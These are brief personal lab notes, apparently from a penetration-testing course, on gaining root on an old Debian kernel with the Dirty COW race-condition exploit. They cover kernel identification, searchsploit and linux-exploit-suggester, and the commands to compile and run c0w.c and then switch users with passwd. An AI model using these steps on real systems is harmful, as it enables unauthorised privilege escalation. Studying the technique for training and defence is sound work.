find system info to google for exploits:
uname -a
output:
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
What we Google for:
Linux debian 2.6.32-5-amd64 exploit
we can also searchsploit!
Dirty COW:
Race Condition Privilege Escalation
We can also identify dirtycow using linux-exploit-suggester
Compile cow:
gcc -pthread c0w.c -o cow
We can use id:
id
to check what user we are before exploiting.
run cow:
./cow
it can take a while.
it still says TCM, how do we switch?
it said backing up passwd. It overwrites that files. We can type that in terminal to switch:
passwd
check who we are again:
id
root!